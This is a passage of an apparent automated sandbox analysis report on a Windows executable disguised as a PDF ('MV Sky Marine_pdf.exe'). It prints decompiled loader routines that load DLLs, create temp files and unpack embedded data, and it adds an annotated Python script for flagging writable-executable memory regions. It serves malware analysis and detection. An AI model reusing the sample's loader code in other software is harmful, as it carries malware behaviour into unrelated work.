                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 204039940-0
                                                                                                  • Opcode ID: d3d50f87e061235e971d25f62681f105daa64d995d1a15accd96cd7252c73184
                                                                                                  • Instruction ID: 6898cdb3987a2b32fc35578c2ad4086051b66c9c82523831343ba455854e1d25
                                                                                                  • Opcode Fuzzy Hash: d3d50f87e061235e971d25f62681f105daa64d995d1a15accd96cd7252c73184
                                                                                                  • Instruction Fuzzy Hash: 11A12274E00209EFEF01CFE4D885BAEBBB5FF09351F20845AE901BA2A4C7755A80DB15
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
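
The Memory Dump Source names above encode where each dumped region sat and what page protection it carried: the 0x10003000 region is listed with protection 0x40 while its neighbours in the same mapping carry 0x20 and 0x02. As an added example, not part of this report or of Joe Sandbox, the following Python splits the names into fields, decodes the protection value with the documented PAGE_* constants, and flags regions that were both writable and executable together with the other regions in the same 64 KiB allocation block. The field names (process index, dump round, id, base, protection, type) are an assumption about the name layout; the type field is carried through undecoded. The sample names are copied from this page.

```python
"""Decode Joe Sandbox .sdmp memory-dump names and flag writable+executable regions.

Added example. Field layout assumed from the names on this page:
<proc>.<round>.<id>.<base>.<protect>.<type>.sdmp
"""
import re
from collections import defaultdict

# Documented PAGE_* protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
WRITABLE_EXECUTABLE = {0x40, 0x80}

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$")


def parse_sdmp_name(name):
    """Split one dump name into its fields and decode the protection value."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError("not an sdmp dump name: %r" % name)
    protect = int(m["protect"], 16)
    base_prot = protect & 0xFF            # low byte: the access class
    return {
        "proc": int(m["proc"], 16),
        "round": int(m["round"], 16),
        "id": m["id"],
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(base_prot, "0x%x" % base_prot)
                        + ("|PAGE_GUARD" if protect & PAGE_GUARD else ""),
        "type": int(m["type"], 16),       # left undecoded (see the lead-in)
        "wx": base_prot in WRITABLE_EXECUTABLE,
    }


def flag_wx_regions(names):
    """One finding per writable+executable region, with the other regions of its 64 KiB block."""
    by_block = defaultdict(list)
    for r in map(parse_sdmp_name, names):
        by_block[(r["proc"], r["base"] >> 16)].append(r)
    findings = []
    for (proc, _block), regions in sorted(by_block.items()):
        regions.sort(key=lambda r: r["base"])
        for r in regions:
            if r["wx"]:
                findings.append({
                    "proc": proc,
                    "base": r["base"],
                    "protect_name": r["protect_name"],
                    "neighbours": [(n["base"], n["protect_name"]) for n in regions if n is not r],
                })
    return findings


# Dump names copied from the Memory Dump Source lists on this page.
SAMPLE_NAMES = [
    "00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp",
    "00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp",
    "00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp",
    "00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp",
    "00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp",
    "00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp",
    "00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for f in flag_wx_regions(SAMPLE_NAMES):
        print("proc %d: %#010x %s" % (f["proc"], f["base"], f["protect_name"]))
        for base, prot in f["neighbours"]:
            print("    neighbour %#010x %s" % (base, prot))
```

On the names from this page the only finding is the 0x10003000 page in process 2, PAGE_EXECUTE_READWRITE, sitting between read-only and execute-read pages of the same mapping; that is the kind of region worth pulling first when checking the "changes PE section rights" signature, since code that was written at run time is what a static scan of the file on disk would not have seen.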

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00406046(intOrPtr _a4) {
                                                                                                  				// Builds "<system directory>\<_a4>.dll" in a stack buffer and loads it by that path.
                                                                                                  				char _v292;
                                                                                                  				int _t10;
                                                                                                  				struct HINSTANCE__* _t14;
                                                                                                  				void* _t16;
                                                                                                  				void* _t21;
                                                                                                  
                                                                                                  				_t10 = GetSystemDirectoryA( &_v292, 0x104); // 0x104 == MAX_PATH; returns the length written, 0 on failure
                                                                                                  				if(_t10 > 0x104) { // buffer too small: treated like a failure
                                                                                                  					_t10 = 0;
                                                                                                  				}
                                                                                                  				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) { // 0x5c == '\\': last character of the directory is already a separator (or the string is empty)
                                                                                                  					_t16 = 1; // select the empty string, no separator added
                                                                                                  				} else {
                                                                                                  					_t16 = 0; // select "\\"
                                                                                                  				}
                                                                                                  				_t5 = _t16 + 0x409010; // 0x5c: points at "\\" (offset 0) or at its terminating NUL (offset 1)
                                                                                                  				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4); // append "<separator><name>.dll" right after the directory string
                                                                                                  				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed; 8 == LOAD_WITH_ALTERED_SEARCH_PATH
                                                                                                  				// Caveat: when GetSystemDirectoryA fails (_t10 == 0) the buffer holds only "<name>.dll", so the
                                                                                                  				// library is then resolved through the normal DLL search order instead of by absolute path.
                                                                                                  				return _t14;
                                                                                                  			}








                                                                                                  Address range of the listed instructions: 0x0040605d to 0x004060b1

                                                                                                  APIs
                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0040605D
                                                                                                  • wsprintfA.USER32 ref: 00406096
                                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060AA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                                                  • API String ID: 2200240437-4240819195
                                                                                                  • Opcode ID: dbe29b16d36e4990d4b8a8d99ebd83d4bb69569e7e7cd5a56c72b64b27b98503
                                                                                                  • Instruction ID: 3700f7ad53493798de0dfa87506cf657db0e618a932e247f1bfd1d2edecc8456
                                                                                                  • Opcode Fuzzy Hash: dbe29b16d36e4990d4b8a8d99ebd83d4bb69569e7e7cd5a56c72b64b27b98503
                                                                                                  • Instruction Fuzzy Hash: 6BF0FC309401156AEB14D764DC0DFFB376CA708305F1405B6B546F20D2D674E9258B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E00403079(intOrPtr _a4) {
                                                                                                  				// Output loop: pulls input in chunks of up to 0x4000 bytes through E004031F5, runs each chunk
                                                                                                  				// through E00406191 into an 0x8000-byte output buffer, and writes whatever that produced to the
                                                                                                  				// file handle at *0x409018. Returns 0 when the output file is complete, -1 if a read fails,
                                                                                                  				// -2 if WriteFile fails or writes short, and -3 if E00406191 reports an error.
                                                                                                  				long _v4; // bytes actually written by WriteFile
                                                                                                  				intOrPtr _t12;
                                                                                                  				intOrPtr _t13;
                                                                                                  				signed int _t14;
                                                                                                  				void* _t17;
                                                                                                  				long _t18;
                                                                                                  				int _t21;
                                                                                                  				intOrPtr _t33;
                                                                                                  				long _t34;
                                                                                                  				intOrPtr _t36;
                                                                                                  				void* _t38;
                                                                                                  				long _t39;
                                                                                                  				intOrPtr _t52;
                                                                                                  
                                                                                                  				_t34 =  *0x795944; // 0x2dc9b
                                                                                                  				_t36 = _t34 -  *0x40b070 + _a4; // bytes still to write; *0x40b070 tracks the current output file offset
                                                                                                  				 *0x7a27ac = GetTickCount() + 0x1f4; // 0x1f4 == 500: a tick-count deadline 500 ms ahead
                                                                                                  				if(_t36 <= 0) {
                                                                                                  					L23:
                                                                                                  					E00402C06(1);
                                                                                                  					return 0; // nothing left to write
                                                                                                  				}
                                                                                                  				E00403227( *0x79d954);
                                                                                                  				SetFilePointer( *0x409018,  *0x40b070, 0, 0); // executed; seek the output file to the current write offset
                                                                                                  				 *0x79d950 = _t36;
                                                                                                  				 *0x795940 = 0;
                                                                                                  				while(1) {
                                                                                                  					_t12 =  *0x795948; // 0x33c11
                                                                                                  					_t33 = 0x4000; // read at most 0x4000 input bytes per iteration ...
                                                                                                  					_t13 = _t12 -  *0x79d954;
                                                                                                  					if(_t13 <= 0x4000) {
                                                                                                  						_t33 = _t13; // ... or whatever input remains
                                                                                                  					}
                                                                                                  					_t14 = E004031F5(0x791940, _t33); // executed; read _t33 input bytes into the buffer at 0x791940
                                                                                                  					if(_t14 == 0) {
                                                                                                  						break; // read failure
                                                                                                  					}
                                                                                                  					 *0x79d954 =  *0x79d954 + _t33; // input consumed so far
                                                                                                  					 *0x40b078 = 0x791940; // input buffer pointer
                                                                                                  					 *0x40b07c = _t33; // input bytes available
                                                                                                  					L6:
                                                                                                  					if( *0x7a27b0 != 0 &&  *0x7a2840 == 0) {
                                                                                                  						 *0x795940 =  *0x79d950 -  *0x795944 - _a4 +  *0x40b070; // bytes written so far
                                                                                                  						E00402C06(0);
                                                                                                  					}
                                                                                                  					 *0x40b080 = 0x789940; // output buffer pointer
                                                                                                  					 *0x40b084 = 0x8000; // output buffer size
                                                                                                  					if(E00406191(?str?) < 0) { // fills the output buffer from the input buffer and advances *0x40b080
                                                                                                  						goto L21; // E00406191 reported an error: return -3
                                                                                                  					}
                                                                                                  					_t38 =  *0x40b080; // 0x78f5db
                                                                                                  					_t39 = _t38 - 0x789940; // number of output bytes produced this round
                                                                                                  					if(_t39 == 0) {
                                                                                                  						__eflags =  *0x40b07c; // 0x0
                                                                                                  						if(__eflags != 0) {
                                                                                                  							goto L21; // no output although input is left unconsumed: error
                                                                                                  						}
                                                                                                  						__eflags = _t33;
                                                                                                  						if(_t33 == 0) {
                                                                                                  							goto L21; // no output and nothing left to read: error
                                                                                                  						}
                                                                                                  						L17:
                                                                                                  						_t18 =  *0x795944; // 0x2dc9b
                                                                                                  						if(_t18 -  *0x40b070 + _a4 > 0) {
                                                                                                  							continue; // more to write: read the next input chunk
                                                                                                  						}
                                                                                                  						SetFilePointer( *0x409018, _t18, 0, 0); // executed
                                                                                                  						goto L23; // output complete
                                                                                                  					}
                                                                                                  					_t21 = WriteFile( *0x409018, 0x789940, _t39,  &_v4, 0); // executed; flush the produced bytes
                                                                                                  					if(_t21 == 0 || _t39 != _v4) {
                                                                                                  						_push(0xfffffffe); // write failed or was short: return -2
                                                                                                  						L22:
                                                                                                  						_pop(_t17);
                                                                                                  						return _t17;
                                                                                                  					} else {
                                                                                                  						 *0x40b070 =  *0x40b070 + _t39; // advance the output file offset
                                                                                                  						_t52 =  *0x40b07c; // 0x0
                                                                                                  						if(_t52 != 0) {
                                                                                                  							goto L6; // input left over from this chunk: run it through E00406191 again
                                                                                                  						}
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  					L21:
                                                                                                  					_push(0xfffffffd); // return -3
                                                                                                  					goto L22;
                                                                                                  				}
                                                                                                  				return _t14 | 0xffffffff; // read failure: return -1
                                                                                                  			}
















                                                                                                  Address range of the listed instructions: 0x0040307d to 0x004031eb

APIs
• GetTickCount.KERNEL32 ref: 0040308E
  • Part of subcall function 00403227: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402ED3,?), ref: 00403235
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000), ref: 004030C1
• WriteFile.KERNELBASE(00789940,0078F5DB,00000000,00000000,5Qy,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?), ref: 0040317B
• SetFilePointer.KERNELBASE(0002DC9B,00000000,00000000,5Qy,00791940,00004000,?,00000000,?,00402F84,00000004,00000000,00000000,00000000,?,?), ref: 004031CD
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: File$Pointer$CountTickWrite
• String ID: 5Qy
• API String ID: 2146148272-1469602788
• Opcode ID: 03cea7c52989f1e595e257d5b21e8a2e0a29f62b4c2e5f88bcf5479e34d25f8e
• Instruction ID: 506e25ed5180e632e4bd4ad1002f7ff9ccba4cce050c735e25e11a5b74d121aa
• Opcode Fuzzy Hash: 03cea7c52989f1e595e257d5b21e8a2e0a29f62b4c2e5f88bcf5479e34d25f8e
• Instruction Fuzzy Hash: AE419F71904215DFD7209F29FE44A277BACF749376704423BE810BA2E0D7396E068B9D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
E00401F84(void* __ebx, void* __eflags) {
	struct HINSTANCE__* _t18;
	struct HINSTANCE__* _t26;
	void* _t27;
	struct HINSTANCE__* _t30;
	CHAR* _t32;
	intOrPtr* _t33;
	void* _t34;

	_t27 = __ebx;
	asm("sbb eax, 0x7a2858");
	*(_t34 - 4) = 1;
	if(__eflags < 0) {
		_push(0xffffffe7);
		L15:
		E00401423();
		L16:
		*0x7a2828 = *0x7a2828 + *(_t34 - 4);
		return 0;
	}
	_t32 = E00402A29(0xfffffff0);
	*(_t34 + 8) = E00402A29(1);
	if(*((intOrPtr*)(_t34 - 0x18)) == __ebx) {
		L3:
		_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
		_t30 = _t18;
		if(_t30 == _t27) {
			_push(0xfffffff6);
			goto L15;
		}
		L4:
		_t33 = GetProcAddress(_t30, *(_t34 + 8));
		if(_t33 == _t27) {
			E00405010(0xfffffff7, *(_t34 + 8));
		} else {
			*(_t34 - 4) = _t27;
			if(*((intOrPtr*)(_t34 - 0x20)) == _t27) {
				*_t33(*((intOrPtr*)(_t34 - 8)), 0x400, 0x7a3000, 0x40b030, " (z"); // executed
			} else {
				E00401423(*((intOrPtr*)(_t34 - 0x20)));
				if(*_t33() != 0) {
					*(_t34 - 4) = 1;
				}
			}
		}
		if(*((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403717(_t30) != 0) {
			FreeLibrary(_t30);
		}
		goto L16;
	}
	_t26 = GetModuleHandleA(_t32); // executed
	_t30 = _t26;
	if(_t30 != __ebx) {
		goto L4;
	}
	goto L3;
}

APIs
• GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
  • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
  • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
  • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
  • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
  • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
Strings
Memory Dump Source
• Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
• Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
• Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID: (z
• API String ID: 2987980305-713140602
• Opcode ID: edea848ad3fa281bb5ab7df7451079881bea4adce82f85ba55a32d944a29b622
• Instruction ID: 8b8487f6955b63f09aa0c92159221d6f4ccc760f28bb0bee438aaf66ace1f0b4
• Opcode Fuzzy Hash: edea848ad3fa281bb5ab7df7451079881bea4adce82f85ba55a32d944a29b622
• Instruction Fuzzy Hash: 42215B72D04215ABDF217FA48E4CAAE7970AF45314F20423BF611B62E0C7BC4982965E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00405A2A(char _a4, intOrPtr _a6, CHAR* _a8) {
	signed int _t11;
	int _t14;
	signed int _t16;
	void* _t19;
	CHAR* _t20;

	_t20 = _a4;
	_t19 = 0x64;
	while(1) {
		_t19 = _t19 - 1;
		_a4 = 0x61736e;
		_t11 = GetTickCount();
		_t16 = 0x1a;
		_a6 = _a6 + _t11 % _t16;
		_t14 = GetTempFileNameA(_a8, &_a4, 0, _t20); // executed
		if(_t14 != 0) {
			break;
		}
		if(_t19 != 0) {
			continue;
		}
		*_t20 = *_t20 & 0x00000000;
		return _t14;
	}
	return _t20;
}


                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00405A3D
                                                                                                  • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                  • API String ID: 1716503409-2514542992
                                                                                                  • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                  • Instruction ID: 7d3f24f284717398f58f3b08164f4a48f1e09f969be73e86d89c445038905459
                                                                                                  • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                                  • Instruction Fuzzy Hash: 6FF027363082447BE7104E25DC44BDB3F9CDF81710F14C027FA049A2C0D2B09A44CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                   C-Code - Quality: 92%
                                                                                                   			/*
                                                                                                   			 * Length-prefixed copy out of the running executable (decompiled). The
                                                                                                   			 * trailing comments carry the instruction address the report lists for
                                                                                                   			 * each statement. Globals: *0x409018 is the open handle to the installer
                                                                                                   			 * image, *0x7a27f8 the base of the embedded data block, *0x795944 the
                                                                                                   			 * current position inside it, 0x791940 a scratch buffer of at least
                                                                                                   			 * 0x4000 bytes. Together with the "nsa" temp-file prefix and the
                                                                                                   			 * GetTickCount/GetTempFileNameA pairing in the function above, this is
                                                                                                   			 * the layout of the NSIS installer stub's data-block reader; that
                                                                                                   			 * identification is an inference from these idioms, not a statement in
                                                                                                   			 * the report. E00403079 is not shown on this page; a negative return
                                                                                                   			 * from it aborts the copy.
                                                                                                   			 *
                                                                                                   			 * _a4  offset into the data block, negative to continue from the
                                                                                                   			 *      current position; reused afterwards as the remaining length
                                                                                                   			 * _a8  output file handle for the streaming path
                                                                                                   			 * _a12 caller buffer; when non-NULL the data is read into it instead
                                                                                                   			 * _a16 size of that buffer; reused as WriteFile's bytes-written slot
                                                                                                   			 * Returns the byte count, -3 on a read failure or short read, -2 on a
                                                                                                   			 * write failure or short write (the _push/_pop pairs at L23/L24 are
                                                                                                   			 * how the decompiler renders "push -3 / pop eax").
                                                                                                   			 */
                                                                                                   			E00402F4E(void* __ecx, int _a4, void* _a8, void* _a12, long _a16) {
                                                                                                   				long _v8;          // bytes actually transferred by ReadFile
                                                                                                   				intOrPtr _v12;     // running return value
                                                                                                   				int _t31;
                                                                                                   				intOrPtr _t32;
                                                                                                   				int _t35;
                                                                                                   				long _t36;
                                                                                                   				int _t37;
                                                                                                   				long _t38;
                                                                                                   				int _t42;
                                                                                                   				long _t43;
                                                                                                   				long _t44;
                                                                                                   				long _t55;
                                                                                                   				long _t57;
                                                                                                   
                                                                                                   				_t31 = _a4;                                                   // 00402f53
                                                                                                   				if(_t31 >= 0) {                                               // 00402f5d
                                                                                                   					// explicit offset: seek to data-block base + offset
                                                                                                   					_t44 = _t31 +  *0x7a27f8;                                 // 00402f66
                                                                                                   					 *0x795944 = _t44;                                        // 00402f6a
                                                                                                   					SetFilePointer( *0x409018, _t44, 0, 0); // executed       // 00402f75
                                                                                                   				}
                                                                                                   				_t57 = 4;                                                     // 00402f7d
                                                                                                   				_t32 = E00403079(_t57);                                       // 00402f7f
                                                                                                   				if(_t32 >= 0) {                                               // 00402f86
                                                                                                   					// 4-byte length header precedes the data
                                                                                                   					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed   // 00402fa2
                                                                                                   					if(_t35 == 0 || _v8 != _t57) {                            // 00402fa6
                                                                                                   						L23:                                                  // 0040306f
                                                                                                   						_push(0xfffffffd);   // return -3: read failure
                                                                                                   						goto L24;
                                                                                                   					} else {                                                  // 00402fb5
                                                                                                   						 *0x795944 =  *0x795944 + _t57;                       // 00402fb8
                                                                                                   						_t32 = E00403079(_a4);                                // 00402fbe
                                                                                                   						_v12 = _t32;                                          // 00402fc5
                                                                                                   						if(_t32 >= 0) {                                       // 00402fc8
                                                                                                   							if(_a12 != 0) {                                   // 00402fd1
                                                                                                   								// buffer path: read min(length, buffer size) into the caller's buffer
                                                                                                   								_t36 = _a4;                                   // 0040303e
                                                                                                   								if(_t36 >= _a16) {                            // 00403044
                                                                                                   									_t36 = _a16;                              // 00403046
                                                                                                   								}
                                                                                                   								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed   // 00403058
                                                                                                   								if(_t37 == 0) {                               // 0040305c
                                                                                                   									goto L23;
                                                                                                   								} else {                                      // 0040305e
                                                                                                   									// a short read is not an error here: the count read is returned
                                                                                                   									_t38 = _v8;                               // 0040305e
                                                                                                   									 *0x795944 =  *0x795944 + _t38;           // 00403061
                                                                                                   									_v12 = _t38;                              // 00403067
                                                                                                   									goto L22;
                                                                                                   								}
                                                                                                   							} else {                                          // 00402fd3
                                                                                                   								if(_a4 <= 0) {                                // 00402fd6
                                                                                                   									L22:                                      // 0040306a
                                                                                                   									_t32 = _v12;                              // 0040306a
                                                                                                   								} else {                                      // 00402fdc
                                                                                                   									// streaming path: copy to _a8 in 0x4000-byte chunks via the scratch buffer
                                                                                                   									while(1) {                                // 00402fe1
                                                                                                   										_t55 = 0x4000;                        // 00402fe1
                                                                                                   										if(_a4 < 0x4000) {                    // 00402fe9
                                                                                                   											_t55 = _a4;                       // 00402feb
                                                                                                   										}
                                                                                                   										if(ReadFile( *0x409018, 0x791940, _t55,  &_v8, 0) == 0 || _t55 != _v8) {   // 00403000
                                                                                                   											goto L23;
                                                                                                   										}
                                                                                                   										_t42 = WriteFile(_a8, 0x791940, _v8,  &_a16, 0); // executed   // 00403014
                                                                                                   										if(_t42 == 0 || _a16 != _t55) {       // 0040301c
                                                                                                   											_push(0xfffffffe);   // return -2: write failure   // 0040303a
                                                                                                   											L24:                              // 00403071
                                                                                                   											_pop(_t32);                       // 00403071
                                                                                                   										} else {                              // 00403023
                                                                                                   											_t43 = _v8;                       // 00403023
                                                                                                   											_v12 = _v12 + _t43;               // 00403026
                                                                                                   											_a4 = _a4 - _t43;                 // 00403029
                                                                                                   											 *0x795944 =  *0x795944 + _t43;   // 0040302c
                                                                                                   											if(_a4 > 0) {                     // 00403036
                                                                                                   												continue;
                                                                                                   											} else {                          // 00403038
                                                                                                   												goto L22;
                                                                                                   											}
                                                                                                   										}
                                                                                                   										goto L25;
                                                                                                   									}
                                                                                                   									goto L23;
                                                                                                   								}
                                                                                                   							}
                                                                                                   						}
                                                                                                   					}
                                                                                                   				}
                                                                                                   				L25:                                                          // 00403072
                                                                                                   				return _t32;                                                  // 00403076
                                                                                                   			}
                                                                                                   

                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00402F75
                                                                                                  • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EFA,000000FF,00000000,00000000,?), ref: 00402FA2
                                                                                                  • ReadFile.KERNEL32(00791940,00004000,?,00000000,?,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00402FFC
                                                                                                  • WriteFile.KERNELBASE(00000000,00791940,?,000000FF,00000000,?,00402EFA,000000FF,00000000,00000000,?,?), ref: 00403014
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: File$Read$PointerWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2113905535-0
                                                                                                  • Opcode ID: 1b24eb38e2c43651d082d2ada225c5565e7c8f32904bb9a4818c579b6989de34
